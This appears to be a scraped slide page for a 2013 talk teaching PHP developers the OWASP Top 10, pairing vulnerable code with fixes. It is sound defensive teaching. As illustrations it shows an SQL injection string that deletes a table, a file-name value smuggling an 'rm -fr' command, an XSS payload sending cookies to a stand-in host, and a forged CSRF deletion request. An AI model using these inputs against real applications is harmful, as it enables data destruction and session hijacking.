Creating REST Applications with the Slim Micro-Framework by Vikram VaswaniCreating REST Applications with the Slim Micro-Framework by Vikram Vaswani
Creating REST Applications with the Slim Micro-Framework by Vikram Vaswanivvaswani
 
RESTful API 제대로 만들기
RESTful API 제대로 만들기RESTful API 제대로 만들기
RESTful API 제대로 만들기Juwon Kim
 
RedisConf18 - Writing modular & encapsulated Redis code
RedisConf18 - Writing modular & encapsulated Redis codeRedisConf18 - Writing modular & encapsulated Redis code
RedisConf18 - Writing modular & encapsulated Redis codeRedis Labs
 
Webinar: AngularJS and the WordPress REST API
Webinar: AngularJS and the WordPress REST APIWebinar: AngularJS and the WordPress REST API
Webinar: AngularJS and the WordPress REST APIWP Engine
 
Webinar: AngularJS and the WordPress REST API
Webinar: AngularJS and the WordPress REST APIWebinar: AngularJS and the WordPress REST API
Webinar: AngularJS and the WordPress REST APIWP Engine UK
 
PHP and Rich Internet Applications
PHP and Rich Internet ApplicationsPHP and Rich Internet Applications
PHP and Rich Internet Applicationselliando dias
 

Similaire à OWASP TOP 10 for PHP Programmers (20)

Owasp & php
Owasp & phpOwasp & php
Owasp & php
 
Doctrine For Beginners
Doctrine For BeginnersDoctrine For Beginners
Doctrine For Beginners
 
Introduction to angular js
Introduction to angular jsIntroduction to angular js
Introduction to angular js
 
Using Geeklog as a Web Application Framework
Using Geeklog as a Web Application FrameworkUsing Geeklog as a Web Application Framework
Using Geeklog as a Web Application Framework
 
Redis & ZeroMQ: How to scale your application
Redis & ZeroMQ: How to scale your applicationRedis & ZeroMQ: How to scale your application
Redis & ZeroMQ: How to scale your application
 
CI/CD on Windows-Based Environments - Noam Shochat, eToro - DevOpsDays Tel Av...
CI/CD on Windows-Based Environments - Noam Shochat, eToro - DevOpsDays Tel Av...CI/CD on Windows-Based Environments - Noam Shochat, eToro - DevOpsDays Tel Av...
CI/CD on Windows-Based Environments - Noam Shochat, eToro - DevOpsDays Tel Av...
 
Fatc
FatcFatc
Fatc
 
Complex Sites with Silex
Complex Sites with SilexComplex Sites with Silex
Complex Sites with Silex
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php Security
 
REST API for your WP7 App
REST API for your WP7 AppREST API for your WP7 App
REST API for your WP7 App
 
Create a res tful services api in php.
Create a res tful services api in php.Create a res tful services api in php.
Create a res tful services api in php.
 
Single Page Web Apps As WordPress Admin Interfaces Using AngularJS & The Word...
Single Page Web Apps As WordPress Admin Interfaces Using AngularJS & The Word...Single Page Web Apps As WordPress Admin Interfaces Using AngularJS & The Word...
Single Page Web Apps As WordPress Admin Interfaces Using AngularJS & The Word...
 
Ditching JQuery
Ditching JQueryDitching JQuery
Ditching JQuery
 
Creating REST Applications with the Slim Micro-Framework by Vikram Vaswani
Creating REST Applications with the Slim Micro-Framework by Vikram VaswaniCreating REST Applications with the Slim Micro-Framework by Vikram Vaswani
Creating REST Applications with the Slim Micro-Framework by Vikram Vaswani
 
RESTful API 제대로 만들기
RESTful API 제대로 만들기RESTful API 제대로 만들기
RESTful API 제대로 만들기
 
RedisConf18 - Writing modular & encapsulated Redis code
RedisConf18 - Writing modular & encapsulated Redis codeRedisConf18 - Writing modular & encapsulated Redis code
RedisConf18 - Writing modular & encapsulated Redis code
 
Webinar: AngularJS and the WordPress REST API
Webinar: AngularJS and the WordPress REST APIWebinar: AngularJS and the WordPress REST API
Webinar: AngularJS and the WordPress REST API
 
Webinar: AngularJS and the WordPress REST API
Webinar: AngularJS and the WordPress REST APIWebinar: AngularJS and the WordPress REST API
Webinar: AngularJS and the WordPress REST API
 
PHP and Rich Internet Applications
PHP and Rich Internet ApplicationsPHP and Rich Internet Applications
PHP and Rich Internet Applications
 
Drupal 8 migrate!
Drupal 8 migrate!Drupal 8 migrate!
Drupal 8 migrate!
 

Plus de rjsmelo

Docker and Running multiple versions of PHP @ CareerZoo Dublin
Docker and Running multiple versions of PHP @ CareerZoo DublinDocker and Running multiple versions of PHP @ CareerZoo Dublin
Docker and Running multiple versions of PHP @ CareerZoo Dublinrjsmelo
 
Docker & PHP - Practical use case
Docker & PHP - Practical use caseDocker & PHP - Practical use case
Docker & PHP - Practical use caserjsmelo
 
PHP QA Tools
PHP QA ToolsPHP QA Tools
PHP QA Toolsrjsmelo
 
PHPUnit your bug exterminator
PHPUnit your bug exterminatorPHPUnit your bug exterminator
PHPUnit your bug exterminatorrjsmelo
 
A Certificação LPI
A Certificação LPIA Certificação LPI
A Certificação LPIrjsmelo
 
PHP and Application Security - OWASP Road Show 2013
PHP and Application Security - OWASP Road Show 2013PHP and Application Security - OWASP Road Show 2013
PHP and Application Security - OWASP Road Show 2013rjsmelo
 
PHP e a (in)segurança de aplicações
PHP e a (in)segurança de aplicaçõesPHP e a (in)segurança de aplicações
PHP e a (in)segurança de aplicaçõesrjsmelo
 

Plus de rjsmelo (7)

Docker and Running multiple versions of PHP @ CareerZoo Dublin
Docker and Running multiple versions of PHP @ CareerZoo DublinDocker and Running multiple versions of PHP @ CareerZoo Dublin
Docker and Running multiple versions of PHP @ CareerZoo Dublin
 
Docker & PHP - Practical use case
Docker & PHP - Practical use caseDocker & PHP - Practical use case
Docker & PHP - Practical use case
 
PHP QA Tools
PHP QA ToolsPHP QA Tools
PHP QA Tools
 
PHPUnit your bug exterminator
PHPUnit your bug exterminatorPHPUnit your bug exterminator
PHPUnit your bug exterminator
 
A Certificação LPI
A Certificação LPIA Certificação LPI
A Certificação LPI
 
PHP and Application Security - OWASP Road Show 2013
PHP and Application Security - OWASP Road Show 2013PHP and Application Security - OWASP Road Show 2013
PHP and Application Security - OWASP Road Show 2013
 
PHP e a (in)segurança de aplicações
PHP e a (in)segurança de aplicaçõesPHP e a (in)segurança de aplicações
PHP e a (in)segurança de aplicações
 

Dernier

"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...Zilliz
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Zilliz
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodJuan lago vázquez
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Angeliki Cooney
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Victor Rentea
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDropbox
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesrafiqahmad00786416
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamUiPathCommunity
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfOverkill Security
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKJago de Vreede
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsNanddeep Nachan
 

Dernier (20)

"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...

OWASP TOP 10 for PHP Programmers

  • 1. OWASP TOP 10 for PHP programmers
  Follow this topic: @rjsmelo, #owasp, #php, #appsec
  RICARDO MELO
  Presented at #PHPLX – 11 September 2013
  • 2. RICARDO MELO
  ● CTO @ DRI
  ● PHP, MySQL, Linux and lots of other OSS
  ● ZCE, RHCE, LPI 3, ITIL, etc.
  ● +10 years building (and breaking) things
  • 3. About
  ● 14-year-old academic spin-off
  ● Pragmatic OSS orientation
  ● PHP, MySQL, SugarCRM, Drupal, JavaScript, Linux, etc.
  ● Crafters, integrators
  ● Always looking for software developers – yes, right now!
  • 4. Outline
  ● OWASP
  ● OWASP TOP 10
  ● What's Next
  ● Conclusions
  1999 - 2013 DRI. Some Rights Reserved.
  • 5. What is OWASP?
  ● Open Web Application Security Project
  ● Worldwide not-for-profit
  ● Focus on security improvement and awareness
  ● Very active community
  ● Lots of projects (you can start yours)
  • 6. What is the OWASP TOP 10?
  ● The name is “The Top 10 Most Critical Web Application Risks”
  ● The focus is awareness
  ● Released 2003, 2004, 2007, 2010 and 2013
  https://www.owasp.org/index.php/Top_10_2013
  • 7. Risk?

  | Threat Agent         | Attack Vectors | Weakness Prevalence | Weakness Detectability | Technical Impacts | Business Impacts                |
  |----------------------|----------------|---------------------|------------------------|-------------------|---------------------------------|
  | Application Specific | EASY           | WIDESPREAD          | EASY                   | SEVERE            | Application / Business Specific |
  |                      | AVERAGE        | COMMON              | AVERAGE                | MODERATE          |                                 |
  |                      | DIFFICULT      | UNCOMMON            | DIFFICULT              | MINOR             |                                 |
  • 8. OWASP TOP 10 - 2013
  ● A1 – Injection
  ● A2 – Broken Authentication and Session Management
  ● A3 – Cross-site Scripting (XSS)
  ● A4 – Insecure Direct Object References
  ● A5 – Security Misconfiguration
  ● A6 – Sensitive Data Exposure
  ● A7 – Missing Function Level Access Control
  ● A8 – Cross Site Request Forgery (CSRF)
  ● A9 – Using Components with Known Vulnerabilities
  ● A10 – Unvalidated Redirects and Forwards
  • 9. A1 – Injection
  ● Occurs when untrusted data is sent directly to the interpreter!
  ● Not only SQL: NoSQL, LDAP, OS, XML, XPath!
  ● Never, NEVER trust ANY input!
  • 10. A1 – Injection Examples – SQL

  Vulnerable version:

```php
<?php
// prone to SQL injection
// script.php?start_record=20
$db = new PDO('mysql:host=localhost;dbname=testdb', 'username', 'password');
$stmt = $db->query(
    "SELECT * FROM some_table limit " . $_REQUEST['start_record'] . ",10");
$result = $stmt->fetchAll(PDO::FETCH_ASSOC);
echo function_to_render_result($result);
// what if I set start_record = "1; delete from some_table; -- "
```

  Fixed version:

```php
<?php
// script.php?start_record=20
$db = new PDO('mysql:host=localhost;dbname=testdb', 'username', 'password');
$stmt = $db->prepare("SELECT * FROM some_table limit ?,10");
// LIMIT operands must be integers: bind as PDO::PARAM_INT so the value is
// never quoted as a string (which MySQL rejects when prepares are emulated)
$stmt->bindValue(1, (int) $_REQUEST['start_record'], PDO::PARAM_INT);
$stmt->execute();
$result = $stmt->fetchAll(PDO::FETCH_ASSOC);
echo function_to_render_result($result);
```
  • 11. A1 – Injection Samples – OS

  Vulnerable version:

```php
<?php
// script.php?file=xpto.pdf
$fileType = exec("file " . $_REQUEST['file']);
echo $fileType;
// but one can try with "xpto.pdf; rm -fr /some/folder"
```

  Fixed version:

```php
<?php
// script.php?file=xpto.pdf
// escapeshellarg() wraps the value in single quotes and escapes any
// embedded quotes, so the shell sees exactly one argument
$fileType = exec("file " . escapeshellarg($_REQUEST['file']));
echo $fileType;
```
  • 12. A2 – Broken Authentication and Session Management
  ● Broken implementations allowing an attacker to assume “other” users' identities!
  ● Can be session hijacking/fixation
  ● Broken authentication
  ● Or other flaws that lead to compromised passwords / keys / session tokens
  • 13. A2 – Session Fixation

  Vulnerable version:

```php
<?php
// prone to session fixation: the session id chosen before login stays valid
// [ ... ]
$userDetails = check_credentials($username, $password);
if ($userDetails !== false) {
    $_SESSION['userIsLoggedin'] = true;
    $_SESSION['userInformation'] = $userDetails;
}
// [ ... ]
```

  Fixed version:

```php
<?php
// [ ... ]
$userDetails = check_credentials($username, $password);
if ($userDetails !== false) {
    // issue a fresh session id on login and delete the old session data
    session_regenerate_id(true);
    $_SESSION['userIsLoggedin'] = true;
    $_SESSION['userInformation'] = $userDetails;
}
// [ ... ]
```
  • 14. A3 – Cross-Site Scripting (XSS)
  ● Whenever untrusted data is sent to the browser without proper validation and escaping!
  ● XSS allows the attacker to OWN the victim's browser and do ... everything!
  ● Stored, Reflected and DOM-based XSS
  • 15. A3 – steal user cookie

  Vulnerable version:

```php
<?php
// page prone to XSS
// script.php?search=hello
$results = some_search_function($_REQUEST['search']);
?>
<html>
<body>
<p>results for : <?= $_REQUEST['search']; ?></p>
<?= render_results($results); ?>
</body>
</html>
```

  set search to: `<script>document.location='http://www.example.com/precious_cookie?cookie='+document.cookie</script>`

  Fixed version:

```php
<?php
// script.php?search=hello
$results = some_search_function($_REQUEST['search']);
?>
<html>
<body>
<p>results for : <?= htmlentities($_REQUEST['search'], ENT_COMPAT | ENT_HTML401, 'UTF-8'); ?></p>
<?= render_results($results); ?>
</body>
</html>
```
  • 16. A4 – Insecure Direct Object Reference
  ● Whenever a developer exposes references to internal objects without proper access control.
  ● Attackers can change the references and access resources that shouldn't be accessible.
  • 17. A4 – Access other user's account

  Vulnerable version:

```php
<?php
// prone to insecure direct object reference
// script.php?account=10
$accountId = intval($_REQUEST['account']);
$account = new Account($accountId);
echo render_account_info($account);
// and if I change account to "9" ?
```

  Fixed version:

```php
<?php
// script.php?account=10
$user = new User($_SESSION['userInfo']);
$accountId = intval($_REQUEST['account']);
$account = new Account($accountId);
// the object is only rendered if the logged-in user may read it
if ($account->canRead($user)) {
    echo render_account_info($account);
} else {
    echo "Access denied";
}
```
  • 18. A5 – Security Misconfiguration
  ● Failing to secure the full stack often leads to the application / servers being compromised.
  ● Take into consideration other services / applications running on the same infrastructure
  ● Watch out for outdated software
  ● Watch out for default accounts
  • 19. A6 – Sensitive Data Exposure
  ● Whenever sensitive data isn't properly protected, allowing attackers to steal or modify that information.
  ● Credit card fraud, identity theft, etc!
  ● Be aware: data should be protected both in transit and in the storage engine (don't forget the backups)
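  One concrete case of protecting sensitive data at rest is password storage. The block below is an added example, not from the slides: it shows how the check_credentials() used in the A2 slide can be written so that a leaked users table does not expose plaintext passwords. It assumes PHP >= 7.0, a PDO handle in $db and a hypothetical table users(id, username, password_hash).

```php
<?php
// Added example (not from the slides). Assumptions: PHP >= 7.0, a PDO
// connection in $db, hypothetical table users(id, username, password_hash).

function store_password(PDO $db, string $username, string $password): void
{
    // password_hash() picks a random salt and a slow algorithm (bcrypt today)
    // and records both in the output string, so no extra columns are needed.
    $hash = password_hash($password, PASSWORD_DEFAULT);
    $stmt = $db->prepare('UPDATE users SET password_hash = ? WHERE username = ?');
    $stmt->execute([$hash, $username]);
}

function check_credentials(PDO $db, string $username, string $password)
{
    $stmt = $db->prepare('SELECT id, username, password_hash FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Always run password_verify(), even for unknown users, so the response
    // time does not reveal which usernames exist.
    static $dummyHash = null;
    if ($dummyHash === null) {
        $dummyHash = password_hash(bin2hex(random_bytes(16)), PASSWORD_DEFAULT);
    }
    $hash = $row ? $row['password_hash'] : $dummyHash;
    $ok = password_verify($password, $hash);
    if (!$row || !$ok) {
        return false;
    }

    // Upgrade old hashes transparently when PASSWORD_DEFAULT or its cost changes.
    if (password_needs_rehash($hash, PASSWORD_DEFAULT)) {
        store_password($db, $username, $password);
    }
    unset($row['password_hash']); // never hand the hash to the rest of the app
    return $row;
}
```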
  • 20. A7 – Missing Function Level Access Control
  ● Most applications validate function-based access control before displaying options in the UI, but fail to validate when the function is accessed.
  ● Attackers can forge requests to functions that shouldn't be available
  • 21. A7 – insecure function

  Vulnerable version:

```php
<?php
// prone to insecure function access
// script.php?user=john&action=read
$userId = $_REQUEST['user'];
$action = $_REQUEST['action'];
$user = new User($userId);
switch ($action) {
    case 'read':
        echo render_user($user);
        break;
    case 'delete':
        $user->delete();
        echo "user Deleted";
        break;
}
// and if I change action to "delete"?
```

  Fixed version:

```php
<?php
$userId = $_REQUEST['user'];
$action = $_REQUEST['action'];
$loggedUser = new AppUser($_SESSION['userInfo']);
$user = new User($userId);
// every action checks the logged-in user's permission, not just the UI
switch ($action) {
    case 'read':
        if ($user->canRead($loggedUser)) {
            echo render_user($user);
        }
        break;
    case 'delete':
        if ($user->canDelete($loggedUser)) {
            $user->delete();
            echo "user Deleted";
        }
        break;
}
```
  • 22. A8 – Cross Site Request Forgery (CSRF)
  ● CSRF forces a victim's browser to send a forged HTTP request to a vulnerable web application (normally taking advantage of an existing user session)
  ● No difference from user-generated requests!
  • 23. A8 – delete user

  Vulnerable app:

```php
<?php
// vulnerable app
// delete.php?id=123
$id = intval($_REQUEST['id']);
$user = new User($id);
$loggedUser = new AppUser($_SESSION['userInfo']);
if ($user->canDelete($loggedUser)) {
    $user->delete();
}
?>
```

  Attacker's site:

```html
<img src="http://www.example.com/users/delete.php?id=123" />
```

  Fixed app:

```php
<?php
// fixed app: the request must carry a token the attacker's page cannot know
$id = intval($_REQUEST['id']);
$user = new User($id);
$loggedUser = new AppUser($_SESSION['userInfo']);
if (validate_token($_REQUEST['token'])) {
    if ($user->canDelete($loggedUser)) {
        $user->delete();
    }
}
```
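  The slide calls validate_token() without showing it. The block below is an added example, not from the slides: a per-session random token, a constant-time check, and the hidden form field that carries it. It assumes PHP >= 7.0 and that session_start() has already been called; the path /users/delete.php is the one from the slide.

```php
<?php
// Added example (not from the slides). Assumptions: PHP >= 7.0 and
// session_start() already called; /users/delete.php is the slide's path.

function csrf_token(): string
{
    // One token per session, created on first use.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function validate_token($token): bool
{
    if (!is_string($token) || empty($_SESSION['csrf_token'])) {
        return false;
    }
    // Constant-time comparison: a plain === would leak timing information.
    return hash_equals($_SESSION['csrf_token'], $token);
}

// The token travels in a hidden field, which a cross-site <img> or an
// auto-submitted form on the attacker's page cannot read or guess.
function render_delete_form(int $id): string
{
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="/users/delete.php">'
         . '<input type="hidden" name="id" value="' . $id . '">'
         . '<input type="hidden" name="token" value="' . $token . '">'
         . '<button type="submit">Delete user</button>'
         . '</form>';
}

// delete.php: require POST for state changes and check the token before
// any authorization or deletion logic runs.
if ($_SERVER['REQUEST_METHOD'] !== 'POST'
    || !validate_token($_POST['token'] ?? null)) {
    http_response_code(403);
    exit('Invalid request');
}
$id = intval($_POST['id']);
// [ ... ] canDelete() check and $user->delete() as in the slide
```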
  • 24. A9 – Using Components with Known Vulnerabilities
  ● Whenever you use libraries, frameworks, or other software modules with known vulnerabilities.
  ● Attackers can leverage these issues to attack your application / server / etc.
  • 25. A10 – Unvalidated Redirects and Forwards
  ● Web applications often redirect users to other pages, using untrusted data to determine the destination pages.
  ● Attackers can redirect victims to phishing or malware pages, or use forwards to access unauthorized pages.
  • 26. A10 – “simple” Forward

  Vulnerable version:

```php
<?php
// prone to unvalidated forward: any method named in ?callback=... is called
class someController extends baseController
{
    public function preFunction($args, $action)
    {
        $this->checkAccess($args, $action);
    }

    public function indexAction($args)
    {
        // [...] do something here
        if ($args['callback'] && method_exists($this, $args['callback'])) {
            $callback = $args['callback'];
            unset($args['callback']);
            // forwards to e.g. destroyAction() without going through preFunction()
            call_user_func_array(array($this, $callback), $args);
        }
        return $response;
    }

    public function destroyAction($args)
    {
        $this->selfTerminate();
    }
}
```

  Fixed version (the forward runs the access check for the target action first):

```php
if ($args['callback'] && method_exists($this, $args['callback'])) {
    $callback = $args['callback'];
    $this->preFunction($args, $callback);
    unset($args['callback']);
    call_user_func_array(array($this, $callback), $args);
}
```
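  The slides show the forward side of A10; the redirect side needs the same care before header('Location: ...') is sent. The block below is an added example, not from the slides: it accepts only local paths or absolute https URLs on the application's own host and falls back to "/" otherwise. It assumes PHP >= 7.0, and www.example.com stands in for the application's host.

```php
<?php
// Added example (not from the slides). Assumptions: PHP >= 7.0;
// www.example.com is a placeholder for the application's own host.

function safe_redirect_target($target, string $fallback = '/'): string
{
    if (!is_string($target) || $target === '') {
        return $fallback;
    }
    // CR/LF and other control characters would allow header injection.
    if (preg_match('/[\x00-\x1f\x7f]/', $target)) {
        return $fallback;
    }
    // "//host" and "/\host" are scheme-relative URLs, not local paths.
    if (preg_match('#^[\\\\/]{2}#', $target)) {
        return $fallback;
    }
    // A single leading "/" means a path on this site: accept it.
    if ($target[0] === '/') {
        return $target;
    }
    // Absolute URLs are accepted only for our own host over https,
    // and never with userinfo ("https://www.example.com@other.host/").
    $parts = parse_url($target);
    $allowedHosts = ['www.example.com'];
    if (is_array($parts)
        && ($parts['scheme'] ?? '') === 'https'
        && !isset($parts['user']) && !isset($parts['pass'])
        && in_array(strtolower($parts['host'] ?? ''), $allowedHosts, true)) {
        return $target;
    }
    return $fallback;
}

// login.php?next=/account          -> redirects to /account
// login.php?next=//other.host/x    -> redirects to the fallback "/"
$next = safe_redirect_target($_GET['next'] ?? null);
header('Location: ' . $next, true, 302);
exit;
```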
  • 27. What's Next For PHP Programmers
  ● OWASP – http://goo.gl/lVRRY
  ● Cheat Sheets – http://goo.gl/lVRRY
  ● OWASP Zed Attack Proxy – http://goo.gl/QE5v1H
  ● OWASP Books – free – http://goo.gl/aLx1q2
  • 28. Conclusions
  ● Keeping the application secure is a continuous process
  ● Avoiding the TOP 10 risks doesn't make your application secure, but it is already a HUGE step forward.
  ● Don't trust ANY input! Escape every output!
  • 30. Follow this topic: @rjsmelo, #owasp, #php, #appsec
  QA
  Feedback: https://joind.in/9107